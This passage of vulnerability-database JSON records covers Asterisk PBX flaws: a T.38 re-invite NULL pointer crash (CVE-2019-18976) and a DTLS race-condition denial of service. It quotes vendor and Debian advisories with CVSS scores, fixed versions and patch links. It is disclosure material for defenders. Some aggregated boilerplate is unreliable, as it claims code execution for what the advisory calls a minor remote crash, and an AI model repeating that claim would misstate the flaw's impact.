{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-17.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.21.diff"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-006.pdf"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"date": "2019-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"date": "2019-11-21T23:02:22",
"db": "PACKETSTORM",
"id": "155434"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1291"
},
{
"date": "2019-11-22T17:15:11.740000",
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"date": "2019-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1291"
},
{
"date": "2024-11-21T04:33:34.090000",
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk Vulnerabilities related to lack of authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.6
}
}
VAR-201911-1367
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -
Product Asterisk
Summary Re-invite with T.38 and malformed SDP causes crash.
Nature of Advisory Remote Crash
Susceptibility Remote Authenticated Sessions
Severity Minor
Exploits Known No
Reported On November 07, 2019
Reported By Salah Ahmed
Posted On November 21, 2019
Last Updated On November 21, 2019
Advisory Contact bford AT sangoma DOT com
CVE Name CVE-2019-18976
Description If Asterisk receives a re-invite initiating T.38
faxing and has a port of 0 and no c line in the SDP, a
crash will occur.
Modules Affected res_pjsip_t38.c
Resolution If T.38 faxing is not needed, then the “t38_udptl”
configuration option in pjsip.conf can be set to “no” to
disable the functionality. This option automatically
defaults to “no” and would have to be manually turned on to
experience this crash.
If T.38 faxing is needed, then Asterisk should be upgraded
to a fixed version.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All versions
Certified Asterisk 13.21 All versions
Corrected In
Product Release
Asterisk Open Source 13.29.2
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28612
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at http://downloads.digium.com/pub/security/.pdf
and http://downloads.digium.com/pub/security/.html
Revision History
Date Editor Revisions Made
November 12, 2019 Ben Ford Initial Revision
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory -
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.1"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "certified asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.21-x"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "certified asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.21-*"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:digium:asterisk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:digium:certified_asterisk",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bford",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
},
"cve": "CVE-2019-18976",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2019-18976",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-01312",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-18976",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-18976",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-18976",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-18976",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-01312",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1292",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -\n\n Product Asterisk \n Summary Re-invite with T.38 and malformed SDP causes crash. \n Nature of Advisory Remote Crash \n Susceptibility Remote Authenticated Sessions \n Severity Minor \n Exploits Known No \n Reported On November 07, 2019 \n Reported By Salah Ahmed \n Posted On November 21, 2019 \n Last Updated On November 21, 2019 \n Advisory Contact bford AT sangoma DOT com \n CVE Name CVE-2019-18976 \n\n Description If Asterisk receives a re-invite initiating T.38 \n faxing and has a port of 0 and no c line in the SDP, a \n crash will occur. \n Modules Affected res_pjsip_t38.c \n\n Resolution If T.38 faxing is not needed, then the \u201ct38_udptl\u201d \n configuration option in pjsip.conf can be set to \u201cno\u201d to \n disable the functionality. This option automatically \n defaults to \u201cno\u201d and would have to be manually turned on to \n experience this crash. \n \n If T.38 faxing is needed, then Asterisk should be upgraded \n to a fixed version. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All versions \n Certified Asterisk 13.21 All versions \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28612 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at http://downloads.digium.com/pub/security/.pdf \n and http://downloads.digium.com/pub/security/.html \n\n Revision History\n Date Editor Revisions Made \n November 12, 2019 Ben Ford Initial Revision \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory -\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "PACKETSTORM",
"id": "155436"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18976",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "155436",
"trust": 1.7
},
{
"db": "CS-HELP",
"id": "SB2019112218",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-01312",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"id": "VAR-201911-1367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
}
],
"trust": 0.948297215
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
}
]
},
"last_update_date": "2024-11-23T21:52:07.503000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2019-008",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/AST-2019-008.html"
},
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Code Issue Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/196675"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=104688"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://seclists.org/fulldisclosure/2019/nov/20"
},
{
"trust": 2.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 2.2,
"url": "https://packetstormsecurity.com/files/155436/asterisk-project-security-advisory-ast-2019-008.html"
},
{
"trust": 1.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2019112218?affchecked=1"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18976"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18976"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-denial-of-service-via-t-38-sdp-re-invite-30937"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.diff"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28612"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/.pdf"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/.html"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.21.diff"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"date": "2019-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"date": "2019-11-21T23:55:55",
"db": "PACKETSTORM",
"id": "155436"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1292"
},
{
"date": "2019-11-22T17:15:11.833000",
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"date": "2019-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1292"
},
{
"date": "2024-11-21T04:33:55.320000",
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
}
}
VAR-202312-0487
Vulnerability from variot - Updated: 2024-08-14 14:30Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-37457
The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49294
It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-0487",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.1"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
